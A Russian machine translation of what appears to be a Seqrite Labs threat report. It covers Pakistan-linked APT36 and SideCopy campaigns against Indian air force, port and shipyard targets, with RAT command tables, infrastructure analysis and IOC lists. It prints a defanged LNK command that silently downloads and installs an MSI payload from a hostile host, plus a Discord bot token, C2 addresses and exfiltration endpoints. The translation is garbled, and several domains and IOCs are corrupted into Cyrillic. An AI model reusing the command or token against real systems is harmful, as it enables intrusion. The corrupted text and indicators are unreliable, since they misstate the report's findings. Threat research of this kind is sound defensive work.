• Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Seqrite Labs Блог
Связаться с отделом продаж Под обстрелом?
  • Продукция и Услуги
        • облако

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • На Прем

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Платформа

          • Malware Analysis Platform
        • Малый бизнес

          • SOHO Total Edition
        • Услуги

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Кибербезопасность и Data Privacy Awareness
  • Решения
    • BFSI
    • Образование
    • Правительство
    • Здравоохранение
    • ITeS
    • Производство
  • O компании
    • О нас Seqrite
    • Руководство
    • Награды и сертификаты
    • Новости
  • Партнёры
    • Партнерская программа
    • Найти партнера
    • Стать партнером
  • Поддержка
  • Ресурсы
    • статьи
    • Статьи
    • Даташит
    • Сферы деятельности
    • Отчеты об угрозах
    • Руководства
    • точка зрения
    • Понимание Data Privacy
    • Проверьте свой рейтинг риска
    • Диалоги ДПДП
    • Час конфиденциальности
Главная  /  Malware  / Зонтик пакистанских угроз: унифицированная тактика киберопераций, направленных против Индии
Зонтик пакистанских угроз: объединенная тактика киберопераций, направленных против Индии
25 июль 2024

Зонтик пакистанских угроз: объединенная тактика киберопераций, направленных против Индии

Написано Сатвик Рам Пракки
Сатвик Рам Пракки
Malware

An открытый каталог хостинг вредоносных программ связанный в Прозрачное Племя (APT36) был найден SEQRITE Команда APT из лабораторий. Fдальнейший анализ показало, в других материалах-носителях URL-адреса on тот же домен содержащие Полезная нагрузка используется его подразделение APT-группа Боковое копирование. Нацеленность на Индийские государственные структуры, такие как воздуха Сила, верфи и порты by SideCopy is наблюдается через мнесколько открытых каталогов которая кашельed свою новыйer Полезная нагрузка, сильная корреляция между se группы вместе с RusticWeb; включая домен/ IP, C2 имя, файл-приманкаs, и больше перекрывается были сожжены наблюдается. В этом блоге мы будет исследовать se Полезная нагрузка and Овехлопает видел в течение последний недавнее увеличение in такие кампании.

Ключевые результаты

APT перекрывается

  • Обнаружено, что на одном домене одновременно размещаются полезные данные SideCopy и APT36, нацеленные на среды Windows и Linux соответственно.
  • Сервер C2, используемый полезными нагрузками RAT SideCopy, имеет то же общее имя (WIN-P9NRMH5G6M8), которое обычно ассоциируется с APT36.
  • Обе группы угроз вместе с RusticWeb, используют один и тот же файл-приманку в различных форматах, инфраструктуре и веб-сервисах в своих цепочках заражения, что укрепляет их связи.

Инфекции SideCopy

  • Использует обновлённый HTA, аналогичный SideWinder, для обхода обнаружения, что делает его полностью необнаружимым (FUD). В стейджере SideCopy были обнаружены закодированные URL-адреса, на которых размещались RTF-файлы APT-группы SideWinder.
  • Обратный RAT доставляется через пакеты MSI с использованием «ВВС Индии Также были обнаружены тема в качестве приманки и варианты Reverse RAT в оперативной памяти. На двух других доменах были обнаружены открытые каталоги, содержащие файлы DOTM для доставки Reverse RAT через BAT-файлы, нацеленные на верфи и порты.
  • Также были замечены новые полезные нагрузки, используемые для кражи документов и изображений, такие как Cheex, USB-копир для кражи файлов с подключенных накопителей, приложение FileZilla и скрипты SigThief.
  • Было выявлено тестирование обхода антивирусной защиты в Пакистане. В то же время, трафик жертв из Индии, который обычно наблюдается с C2, расположенного в Германии, маршрутизируется по протоколу IPsec с пакистанских IP-адресов, которые используются совместно. Брат-профессор от команды Cymru.
  • Новая полезная нагрузка на базе .NET, называемая Geta RAT, выполняется в памяти HTA и включает в себя функционал захвата браузера из Async RAT. Параллельно с этим, Action RAT загружается извне. charmap.exe вместо credwiz.exe/reykeywiz.exe и использование темы «медовая ловушка», названной «Изображение WhatsApp» виден.

Прозрачные инфекции племени

  • Загрузчик на основе Golang, предназначенный для систем Linux, используется для извлечения финальной полезной нагрузки из Google Диска. Недавно было замечено, что эта финальная полезная нагрузка загружается с домена и получила название ДИСГОМОДЖИ Volexity, где упоминались «слабые инфраструктурные связи с SideCopy».
  • Группа продолжает нацеливаться на платформу Linux с Poseidon, используя ярлыки на рабочем столе с привлекательными темами, такими как "Pостинг/Перевод по Ф-III Rвращательный Transfer», "Черный список IP-адресов с TLP и датами" и ‘Контрольный список LTC.
  • Использование Crimson RAT с «Результаты выборов в Уттаракханде» и «Краткое изложение заявления TDS» Также были замечены приманки со встроенным приложением FileZilla.

Рис. 1 – Перекрывающаяся цепочка заражения

Перекрывающаяся атака

Домен, найденный в открытом каталоге, — кампуспорталы[.]в с несколькими папками, размещёнными на нём. Они содержат полезные нагрузки Linux на Golang, приписываемые APT36, но в то же время было обнаружено несколько скрытых URL-адресов, на которых размещаются стейджеры HTA, принадлежащие SideCopy APT. Домен изначально служил руководством к различным вступительным экзаменам в Индии, последний пост о которых в их Twitter/YouTube был опубликован в 2016 году. Аналогичный открытый каталог был наблюдается ранее размещал SideCopy-стейджеры на том же программном обеспечении LiteSpeed Веб-сервер. В данном случае домен обзорзадания[.]в был использован для другого образовательного портала, посвященного услугам дошкольного образования и ухода.

Рис. 2 – Открытый каталог, где размещены APT36 и скрытые URL-адреса с стейджерами SideCopy

В одном из каталогов находится ZIP-архив, содержащий защищённый паролем PDF-файл и двоичный файл ELF, упакованный UPX. При распаковке открывается двоичный файл Golang, который выполняет функцию загрузчика и сначала открывает поддельный PDF-файл, используя пароль.745414'. Тема приманки — опрос об использовании интернета, который наблюдался в нескольких предыдущих кампаниях SideCopy с февраля 2023 года.

Рис. 3 – Приманка для интернет-опроса

Затем он загружает полезную нагрузку следующего этапа с Google Диска как gnucoreinfo в скрытый каталог .x86_32-linux-gnu, делает его исполняемым и запускает в фоновом режиме. Сохранение настраивается с помощью двух записей AutoStart на рабочем столе: GNOME_Core.desktop и GNULib_Update.desktop. Скрипт bash удален и зарегистрирован для крон задание по загрузке полезной нагрузки и убедитесь, что не запущен дублирующий процесс, как показано ниже.

Рис. 4 – Процесс загрузчика Golang в скрипте сохранения

Вариант DISGOMOJI

Последняя полезная нагрузка — это еще один упакованный UPX двоичный файл ELF на базе Golang, называемый «vmcoreinfo.txt'. Это троян удалённого доступа, основанный на репозитории с открытым исходным кодом. дискорд-c2, который использует сервер Discord в качестве C2 и эмодзи для общения. Volexity наблюдал различные варианты DISGOMOJI, где идентификатор сервера и токен бота сервера Discord либо жестко запрограммированы, либо загружаются во время выполнения, как BID1.txt и GID1.txt от ordai[.]questВ этой версии для их загрузки используется Google Drive со следующими именами, что указывает на то, что это второй сервер:

Имя файла Подробности и ссылки для скачивания на Google Диске
BID2.txt MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID)
hxxps://drive.google.com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe
GID2.txt 1246900038160879688 (токен бота)
hxxps://drive.google.com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t
GTK-Theme-Parse.txt 2bf596603c432fa46b494dc3edd2d30f (MD5)
hxxps://drive.google.com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_

Все представленные сообщения об ошибках пытаются увести от фактической функциональности, но замечено одно интересное имя ошибки: «Ошибка обновления Репозиторий Кавача: %v«. Запутанный файл с именем GTK-Theme-Parse.txt Загружается программа, которая периодически копирует файлы с подключенных USB-накопителей в локальный каталог. Аналогичным образом настраивается cron-задание для сохранения, и эти файлы можно извлечь с помощью RAT на основе эмодзи.

Рис. 5 – Замаскированный скрипт похитителя USB-носителей

DISGOMOJI изначально собирает основные сведения о системе, а его функциональность включает в себя создание снимков экрана, выполнение команд, загрузку файлов на веб-сервисы (оши[.]ат и перевод[.]ш), скачивать и загружать файлы через сервер Discord, получать профили браузера Firefox и находить файлы по расширению для извлечения. В последнем есть уникальная строка на пенджаби (самом популярном языке в Пакистане), которая переводится как «Я дал тебе все знания, чего ещё ты хочешь?», что подходит для извлечения данных. Новые версии для Windows и Linux PYSHELLFOX и GLOBESHELL за кражу файлов и профилей Firefox также упоминалась компания BlackBerry.

Рис. 6 – Сообщение об эксфильтрации

Вариант Посейдона

Мы также наблюдали постоянное развертывание агентов Poseidon через ярлыки рабочего стола Linux компанией Transparent Tribe, где файлы-приманки размещались аналогичным образом на Google Drive, имея фикуматры gmail.com и fitfalcon0900 gmail.com как владелец аккаунта. три различный манки наблюдается все они связаны с различными документами правительства Индии. Эти  остинг/перевод офицеров при Министерстве Обороны с предыдущего года, занесенные в черный список IP-адреса с ТЛП и даты и чекk список для претензий LTC.

Рис. 7 – Ложный черный список IP-адресов с Poseidon (1)

Рис. 8 – Контрольная ловушка с «Посейдоном» (2)

Рис. 9 – Размещение/передача приманка с Посейдоном (3)

Боковое копирование

На основе URL-адресов, обнаруженных при недавнем заражении SideCopy, были выявлены похожие хостинги HTA-стейджеров и те же приманки. Заражение начинается с архивного файла-ярлыка, который запускает процесс MSHTA для выполнения удалённых HTA-файлов, размещённых на том же домене. Всего было обнаружено шесть HTA-файлов с именами 1.hta or 2.hta. Первый вариант HTA включает две функции декодирования base64: одна основана на JavaScript, а другая использует объекты ActiveX. Функциональность остаётся прежней: проверка версии .NET, установка антивирусной защиты, объединение полезной нагрузки и декодирование строк, а также выполнение DLL-библиотеки в памяти с передачей файла-обманки.

Рис. 10 – HTA stager 2nd вариант

Второй вариант HTA сильно запутан и наблюдается лишь время от времени с прошлого года, для чего используются несколько методов:

  • Декодируйте строку, закодированную в формате base64, используя собственный алфавит.
  • Расшифровка на основе XOR (с ключами: f551e832 и bWqQ)
  • Перестановка строк на каждые 1/2/5 символов
  • Сдвиг шифра Цезаря с использованием нескольких ключей

Рис. 11 – Деобфускация в HTA

Общая функциональность осталась прежней, но эти шаблоны обфускации были замечены в HTA SideWinder APT с прошлого года. Строки, которые не используются нигде в скрипте, содержат URL-адреса (кабинет-gov-pk[.]ministry-pk[.]net), на котором несколько лет назад размещались RTF-файлы SideWinder.

Рис. 12 – SideCopy stager с URL-адресами SideWinder (комментарии из анализа)

В памяти preBotHta DLL выполняет обычную последовательность действий: открывает обманку и устанавливает антивирусное решение. В зависимости от антивирусного решения, он устанавливает сохранение в виде комбинации запланированной задачи (VBScript), ключа реестра или ярлыка запуска. В конечном итоге он либо устанавливает два дополнительных файла HTA, либо загружает MSFTEDIT.dll (Action RAT) изhxxps://campusportals.in//files//documents//backup//ap.txt' который загружен сбоку charmap.exe который подключается к 64.188.27[.]144 на порту 5863 для C2.

Рис. 13 – Домен SideWinder, на котором размещены файлы RTF

Удалённые HTA-файлы называются useH, useT и alphaT и обладают той же функциональностью HTA, что и упомянутая выше, и в конце запускают DLL-библиотеку в памяти. Обнаружены две разные DLL-библиотеки: одна — Reverse RAT, включающая 19 команд для C2 и USB-захватчик файлов для сохранения файлов и папок при подключении нового диска. Вторая — новый Geta RAT на базе .NET с 30 командами для C2, который также может похищать данные всех учётных записей, профилей и файлов cookie браузеров Firefox и Chromium. Этот плагин для браузера заимствован из Async RAT, как показано ниже.

Рис. 14 – Geta RAT против Async RAT

Нет Command Функциональность системы
1 Отключенные Закрыть соединение
2 Системная информация Получить системные данные (имя компьютера, имя пользователя, размер экрана, доступная и общая память (физическая и виртуальная), сведения об ОС, состояние заряда батареи, время работы системы, драйверы, сведения о сети)
3 убийство Убить определенный процесс и получить список процессов
4 Менеджер процессов Получить список процессов
5 ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ Получить установленное программное обеспечение
6 пароли Получите учетные данные Firefox и браузера на базе Chromium из всех учетных записей/профилей/файлов cookie
7 RD Получить снимок экрана удаленного рабочего стола
8 GetPcBounds Получить размер экрана
9 SetCurPos Установить положение курсора
10 GetHostsFile Получить файл \etc\hosts
11 SaveHostsFile Сохранить файл \etc\hosts в указанном месте
12 GetCPText Получить содержимое буфера обмена
13 СохранитьCPText Сохранить содержимое буфера обмена в указанном месте
14 Оболочка Выполнить команду через «cmd /C»
15 Начало записи Функциональность не определена, но, скорее всего, используется для захвата экрана.
16 Остановка записи Функциональность не определена, но, скорее всего, используется для захвата экрана.
17 ЗаписьСкачать Функциональность не определена, но, скорее всего, используется для захвата экрана.
18 ListDrives Получить список дисков
19 СписокФайлов Получить файлы и каталоги по указанному пути
20 MkDir Создать новый каталог
21 RmDir Удалить каталог
22 rnfolder Переименовать каталог
23 mvdir Переместить каталог
24 rmfile Удалить файл
25 rnfile Переименовать файл
26 общий файл Скачать файл
27 пробег Запустить файл
28 Выполнить 1. Загрузите файл и запустите его с помощью DLL Side-loading.
2. Выполните «cmd /C netstat -ano» и получите статус подключения IP-адреса сервера.
3. Установите AV
29 addSys Установить сохранение через реестр или автозагрузку
30 файл загружен Загрузить файл

Были замечены две похожие версии HTA, напоминающие CACTUS TORCH и SILENT TRINITY, но они полностью избежали обнаружения. Они запускаются через файлы-ярлыки и используют такие темы, как «медовая ловушка» и противостояние США и Китая, чтобы в конечном итоге сбросить последнюю полезную нагрузку.

Рис. 15 – Новый этап HTA

В этом новом HTA отмечены следующие отличия, хотя функциональность осталась прежней:

  • Помимо декодирования base64, используется ещё одна функция с заданной длиной для декодирования данных. В первую очередь, встроенная DLL кодируется дважды с помощью этих функций.
  • Обманный файл и загружаемая сбоку библиотека DLL не встраиваются отдельно в HTA, а в саму .NET DLL.
  • Не использует запросы WMI для установки AV и VBScript для получения версии .NET.
  • Важно отметить, что не указана цель для создания экземпляра и динамического вызова.

Рис. 16 – Упрощенная версия HTA

Вместо загрузки preBotHta or SummitOfBion в памяти, BroaderAspect.dll Видно, как он устанавливает приманку и открывает её. Проверка антивирусом не производится, но ключ запуска реестра настроен на сохранение, и DLL (DUser.dll) загружается через rekeywiz. Целевой каталог — «C:\Users\Public\BroadCastUSB\crezly.exe», а путь PDB, связанный с двумя файлами, — «E:\TestAssembly\obj\Debug\BroaderAspect.pdb».

Рис. 17 – DLL, работающая в памяти MSHTA

Обратные RAT-кампании

Были отмечены многочисленные случаи заражения, приводящие к обратному RAT, с использованием приманок и поддельных доменов, связанных с различными судостроительными доками, портами и даже Военно-воздушными силами. Все эти организации находятся в ведении Министерства обороны (МО) и Министерства портов, судоходства и водных путей (MOPSW) Индии.

Рис. 18 – Обратная инфекция RAT и цели

Отдельный вариант Reverse RAT был выпущен в виде MSI-пакета в то же время. ZIP-файл с именем «Повышение_зарплаты_за_2024_финансовый_год' содержит ярлык LNK для загрузки и запуска пакета MSI как:

  • C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/

Пакет состоит из PE-файла .NET Confuser, который запускается во время выполнения пользовательских действий и установки, как показано на рисунке ниже. Обратный RAT удаляется как «C:\\ProgramData\\VSUpdates\\svirbre.exe» в конце с теми же 19 командами для C2 и сохранение для него устанавливается через другой скрипт HTA fileros.hta с помощью ключа реестра run.

Нет Command Функциональность системы
1 пробег Запустить файл
2 список Список файлов или каталогов по пути
3 убийство Убить запущенного процесса
4 Закрыть Закройте соединение с C2
5 переименовать Переименовать файл
6 экран Сделайте снимок экрана
7 загружать Загрузить файл в C2
8 удалять Удалить файл
9 зарегистрировать Перечислите все ключи реестра и их значения.
10 процесс Список всех запущенных процессов
11 программы Список всех установленных программ
12 скачать Загрузить файл из C2
13 creatdir Создать новый каталог
14 shellexec Выполнить команду или открыть файл с помощью cmd.exe
15 regnewkey Создайте новый раздел реестра
16 буфер обмена Извлечь содержимое буфера обмена
17 regdelkey Удалить раздел реестра
18 downloadexe Скачать и выполнить файл
19 набор буфера обмена Установить содержимое буфера обмена

Рис. 19 – Пакет MSI для отказа от Reverse RAT

Цепочка заражения полезными нагрузками выглядит следующим образом:

Имя файла Описание
Salary_Increment_FY_2024.zip Дата изменения: 2024
Salary_Increment_FY_2024.pdf.lnk Идентификатор машины: cop125n, Дата изменения: 2023
newpictures.png (MSI) Дата изменения: 2020, Автор: MSTech Soft
Filmeos.exe .NET Confuser 1.x
svirbre.exe (обратный RAT) Ключ: winupdates@7
C2: defender.windowupdatecache[.]in/officalupdates

В сброшенном документе содержится информация о повышении заработной платы военнослужащим ВВС Индии. Это недавний документ, в котором указана дата начала выплат — июль 2024 года.

Рис. 20 – Платежная приманка индийских ВВС

Больше открытых каталогов

В июле были обнаружены ещё два домена с открытыми каталогами, на которых размещались как новые, так и старые вредоносные данные SideCopy, судя по временным меткам. Они содержат множество EXE-, PNG-, PDF-, BAT- и других документов, используемых в кампаниях Reverse RAT. Домен slidesfinder[.]com размещенные образцы июля, которые извлекают полезные данные из другого домена mazagondoc[.]com, который, в свою очередь, размещал файлы в октябре 2023 года для атак с внедрением шаблонов.

Рис. 21 – Открытые каталоги, в которых размещены полезные данные SideCopy

Два шаблона документов с поддержкой макросов, названные Aerospace.dotm и tmps.dotm Было замечено, что начинается цепочка заражения. При открытии документа запускаются обфусцированные подпрограммы, которые загружают размещенный PNG-файл как пакетный скрипт.08973422348.bat» в каталог TEMP, если ответ HTTP — 200. Если файл существует, он запускает пакетный файл с помощью функции Shell.

Рис. 22 – Макрос VBA в шаблонах документов

В одном из шаблонов он позже вызывает подпрограмму UNLK, которая изменяет прикрепленный шаблон активного документа на Normal.dotm Шаблон в каталоге пользователя, а затем закрывает документ без сохранения изменений. В случае ошибки вызывается подпрограмма DVBP, которая пытается удалить все компоненты VBA из документа, тем самым удаляя весь код VBA. Пакетный скрипт, показанный ниже, по сути, загружает полезную нагрузку Reverse RAT в формате PNG, используя PowerShell, копирует его в скрытый каталог и создает запланированную задачу для запуска каждые 5 минут.

Рис. 23 – Пакетный скрипт для загрузки обратного RAT

Файл-приманка Письмо002.pdf Также одновременно загружается и открывается информация о контрактах компании Cochin Shipyard Limited, действующей в рамках Министерства портов, судоходства и водных путей, за январь 2024 года. Доступна вся ежемесячная информация о контрактах. публично на их законном домене. Помимо прослушивания 19 команд, Reverse RAT загружает ещё один файл с mazagondoc[.]com домен, имитирующий официальное название Mazagon Dock Shipbuilders Limited Министерства обороны – mazagondock[.]в Этот домен, содержащий полезные данные, также был замечен в кампании октября 2023 года, распространявшей Revere RAT с аналогичными целями. C2, обнаруженный в Reverse RAT, vocport[.]com/Contactus, который имитирует сферу деятельности Управления порта VO Chidambaranar при Министерстве портов, судоходства и водных путей.

 

Рис. 24 – Ложная цель с подробностями контракта с верфью Кочин

Все больше и больше .NET

Загружается и запускается новая полезная нагрузка на базе .NET, которая позволяет искать и сохранять файлы с определённым расширением. Они затем распространяются на следующие серверы, как показано в двух образцах:

  • hxxp://149.28.95.195/dakshf_upload.php
  • hxxps://googleservices[.]live/dakshf_upload.php

Эти образцы также содержат путь PDB исходного проекта под именем пользователя ««Мертвая змея» с именем cheex (существует не связанная онлайн-платформа с таким именем). Он проверяет пять папок – «Рабочий стол», «Личные», «Общие документы», «Загрузки» и «Недавние» – на наличие файлов с 12 расширениями: DOCX, DOC, XLSX, XLS, PPTX, PPT, PDF, BAK, JPEG, JPG, PNG и TXT.

C:\Users\Dead Snake\source\repos\cheex-folderwise\cheex\obj\Release\dlhost.pdb
C:\Users\Dead Snake\source\repos\cheex\cheex\obj\Debug\cheex.pdb

Рис. 25 – Новые полезные нагрузки для извлечения файлов

Как видно из вышеприведенного примера Reverse RAT, поставляемого через MSI-файл, который включал функцию извлечения файлов с подключенных USB-устройств, теперь эта функция представлена ​​в виде отдельного модуля. Все буквы дисков перечисляются, и файлы копируются в каталог TEMP с помощью фоновых рабочих процессов перед загрузкой на тот же IP-адрес. Пути PDB, наблюдаемые для двух образцов, следующие:

e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Release\AdobeReaders.pdb
e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Debug\AdobeReaders.pdb

Другие обнаруженные файлы — это документы с поддержкой макросов, приманки, приложение FileZilla (используемое для передачи файлов) и скрипт Python с открытым исходным кодом. SigThief использовались для кражи и добавления подписей, размещались в связи с предыдущими кампаниями.

  • Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_29092023.docx
  • Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_131023.docx
  • Отчет_по_разделу_проекта_и_услуг_10102023.docx
  • Письмо002.pdf
  • NavalProjects.pdf

На том же домене были обнаружены и другие документы-приманки, используемые в кампаниях 2023 года. Они связаны с разрешениями на вход в порт для государственного управления порта Чидамбаранар и статусом счетов-фактур поставщиков, связанных с военно-морскими проектами. Эти приманки публично имеющиеся документы.

Рис. 26 – Приманка в виде морского порта из кампании октября 2023 г.

Рис. 27 – Приманка на тему счета-фактуры военно-морского проекта из кампании октября 2023 г.

Инфраструктура и атрибуция

На основании проведенного нами анализа мы обнаружили совпадения между тремя APT-группами, связанными с Пакистаном. Известно, что группа Transparent Tribe использует разнообразный набор техник и языков, таких как Golang, Python и т. д., а Operation RusticWeb использует полезную нагрузку на основе Rust. Обе группы используют оши[.]ат веб-сервис, два одинаковых документа-приманки PDF и их поддельные домены были преобразованы в один и тот же IP-адрес, как это наблюдали BlackBerry и Volexity.

Рис. 28 – Пакистанские APT-перекрытия

Аналогичным образом, наблюдались совпадения между SideCopy и APT36, такие как приманки, Linux-stager для сброса Ares RAT и Poseidon соответственно, полезные нагрузки на основе АллаКоре РАТ и общее название для C2. Мы считаем, что RusticWeb напрямую связан с APT36 со средней или высокой степенью уверенности, подобно SideCopy, действующей как подгруппа APT36.

Поддельные/скомпрометированные домены, используемые для размещения полезных нагрузок, преобразуются в следующие IP-адреса, два из которых имеют общее имя WIN-BEJO0EMFO5K.

Домен IP ASN
кампуспорталы[.]в 192.64.117[.]203 AS22612 – Namecheap
mazagondoc[.]com 172.67.217[.]17
CN=WIN-BEJO0EMFO5K
AS13335 – Cloudflare
slidesfinder[.]com 103.133.215[.]65
CN=WIN-BEJO0EMFO5K
AS133643 – Ewebguru, Индия
дипл[.]сайт 151.106.117[.]91 AS47583 – Хостингер
уткалсевасамитиканжурмарг[.]в 162.0.209[.]114 AS22612 – NameCheap

Если посмотреть на серверы C2, IP-адрес 64.188.27[.]144 использовался с Action RAT и Geta RAT на тех же портах, но даже Reverse RAT C2 checkdailytips.servehttp[.]com Разрешённый этому IP-адресу. Общее имя, связанное с ним, WIN-P9NRMH5G6M8 встречается на большинстве C2-серверов APT36.

Рис. 29 – IP с общим названием APT36

Домен vocport[.]com используется в настоящее время, а также в прошлых кампаниях с октября 2023 года. Данные WHOIS всех серверов C2 с наблюдаемыми полезными нагрузками приведены ниже:

IP ASN полезная нагрузка
vocport[.]com
104.21.40[.]190
172.67.156[.]79
AS13335 – Cloudflare Обратная RAT
defender.windowupdatecache[.]в
172.67.128[.]127
AS13335 – Cloudflare Обратная RAT
checkdailytips.servehttp[.]com
dns1.indianblog[.]xyz
64.188.27[.]144
AS8100 – QuadraNet

CN=WIN-P9NRMH5G6M8

Обратная Крыса, Крыса Действия, Крыса Гета
googleservices[.]live
149.28.95[.]195
AS13335 – Cloudflare
AS20473 – Чупа
Cheex, USB-копир
84.247.170[.]237 AS51167 – Контабо Новая КРЫСА
165.22.221[.]71
178.128.166[.]148
152.42.162[.]105
161.35.207[.]209
159.65.146[.]80
157.245.100[.]177
AS 14061 – DigitalOcean Посейдон

На основании этой корреляции и предыдущих цепочек атак эти кампании с высокой степенью уверенности приписываются обеим группам APT36 и SideCopy, что устанавливает еще одну прочную связь между ними.

Заключение

Обнаружено несколько открытых каталогов, содержащих стейджеры/полезную нагрузку, связанную с пакистанскими APT-группами, нацеленными на ВВС Индии, порты и верфи государственных структур. Были отмечены различные кибероперации, в которых обнаружено пересечение атак Transparent Tribe, SideCopy и RusticWeb.

APT36 фокусируется преимущественно на системах Linux, тогда как SideCopy нацелена на системы Windows, добавляя новые полезные нагрузки в свой арсенал. Во втором квартале 2024 года было зарегистрировано несколько связанных с Пакистаном группировок, нацеленных на Индию и использующих вредоносное ПО для Android. Среди них — Operation Celestial Force, отслеживаемая как… Космический Леопард и еще один новый группы использование WhatsApp для доставки SpyNote RAT. Рекомендуется принять необходимые меры предосторожности и оставаться в безопасности на фоне непрекращающихся кибератак на Индию.

SEQRITE Protection

  • Lnk.Sidecopy.48846.Gen_GC
  • MSI.Sidecopy.48847.GC
  • JS.Sidecopy.48848.Gen_GC
  • Docx.APT36.48849.GC
  • ELF.Agent.48863.GC
  • ELF.Agent.48860.GC
  • O97M.Dropper.DZ
  • BAT.Downloader.48924
  • XML.SideCopy.48922
  • XML.SideCopy.48923
  • TrojanAPT.ReverseRAT.S33893087

МНК

Боковое копирование

HTA
ced11422832a7380381323ae78a7a9bc
f270105309e6574cab7a6acb1efb3c20
c574b2ebcc0aff84a23f1215f8a803be 
1.hta
4938f42a3d691ef78f1ee8edc3b38f87
817532c454637a302238a4751694c336
e2f8fbc105a84283e191362f4ca07ae4
2.hta
7c3b49f642f19116878b2c190f344f63 альфаТ.хта
f6a58b0d267c7c53ccbcc6dafafd499b
f55afc8192f30ff7a584dbda700383d1
useH.hta
d6ae362b4b3f7a67949d177fdfc6bdec useT.hta
907ba4486c589f2cb4a45b92f2a5350e Imge12542.hta
336316c1b5ed77d31b4adc06e06a2f84 ugt254d.hta
LNK
f60c1a04161f354f0c6ac4678b3062d0 Salary_Increment_FY_2024.pdf.lnk
4dfdacf33db6ae0341b4d0e65aa3d755 WhatsApp_Image_2024-05-06.lnk
2041d2347f78ce03c1f9e990724adf3c Противостояние_США_Китай_Возможность_для_Индии-Чадха-21-Авг-23.lnk
ZIP
fe8bf0bf2697d5e43e38d4b0364485a6 Salary_Increment_FY_2024.zip
b99717d81e142e58af91efb4d5288bda WhatsApp_Image_2024-05-06.zip
109897ba1f92339f9dc9a74dc38dfc88 US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip
Малдок
807e6c1094b760e748a84ef9e05bc1f8 Aerospace.dotm
abb863131bbffad1dd8ee72d0758f34b tmps.dotm
eebb4913b54af93bcfc7d56e081502af Отчет_по_разделу_проекта_и_услуг_10102023.docx
e73b0354790273b0fcaa8c2deab3ad87 Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_131023.docx
44b23edd6c9a63a2a38f1bf3d4ff5bb9 Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_29092023.docx
354716db015373c089744e7319cd93d3 Отчет_по_разделу_оплаты_проектов_военно-морских_проектов_29092023.docx
Другое
6b45d5f194e2799e5178c8d858673900 08978.png (летучая мышь)
56fd3a2f701d30fe3e5ebdd0d471f1ed newpictures.png (MSI)
EXE
2478a5f6b82461eb06f3099478c4e2f6 DUser.dll
97113b266fbff61d8d2f92793672688d Filmeos.exe
96764912417d260653b6949afb0ad25c Chromes.exe
6a0adcf34a2f0ac21089b994dff02b85 Файлзилла.exe
Обратная RAT
a7a71259bdf700807a763119fd652e73 svirbre.exe / Fantos.exe
c006701ec5025222a74a419f8c238689 Postgrex.exe / rtloki.png
d5719a9ef7a6f012e26d0c86b4a676d9 igfxm.exe / rt12.png
e6404136626a446b46bf4ecaa885560e igfxtk.exe
Cheex
825c7a1603f800ff247c8f3e9a1420af AdobeArm.exe / dlhost.exe
253957d7df5c7e70ec9001766e8f087b cheex.exe
USB-копир
3d2001c112290c019afcd51fede564d3 AdobeReaders.exe / msedg.exe
7ca8532b081f8612d1c0b6ea01d40299 AdobeReaders.exe / msedgprefix.exe
Приманки
5e88b5122ae380c4b4741dcf0bdca198 Salary_Increment_FY_2024.pdf
e415374f1f9533f10f706f0a9124b0d4 Изображение WhatsApp 2024 в 05:06:12.23.08 AM.jpeg
e79ca3852ae5e14766544ec1d5d4d268 Противостояние США и Китая – возможность для Индии, Чадха, 21 августа 23 г., pdf
cc0b292144ccdf4a95014809258982c4 Письмо002.pdf
584ce9670a6f6a16eaaa615d64788f68 NavalProjects.pdf
b2e007c6bde2d2ce03a5257732df95b2 001doc.pdf
d254f6d56ad874c5095b92d620cb5b80 IT-тренды.docx
5fc559e4b663c20c9d5ea46fd164f4c7 Опрос.docx
f997a21e9f7ad5eb9242b4decb7fdeb9 Индия — развивающаяся глобальная экономика.docx
Домены (поддельные/скомпрометированные)
уткалсевасамитиканжурмарг[.]в 162.0.209[.]114
дипл[.]сайт 151.106.117[.]91
кампуспорталы[.]в 192.64.117[.]203
mazagondoc[.]com
slidesfinder[.]com
C2 и порты
checkdailytips.servehttp[.]com/dailyworkout
защитник[.]windowupdatecache[.]в/
172.67.128[.]127:80 
84.247.170[.]237:4858
64.188.27[.]144:5863
hxxp://vocport[.]com/Contactus
hxxp://vocport[.]com/khalistanLeaderprotest
hxxp://149.28.95[.]195/dakshf_upload.php
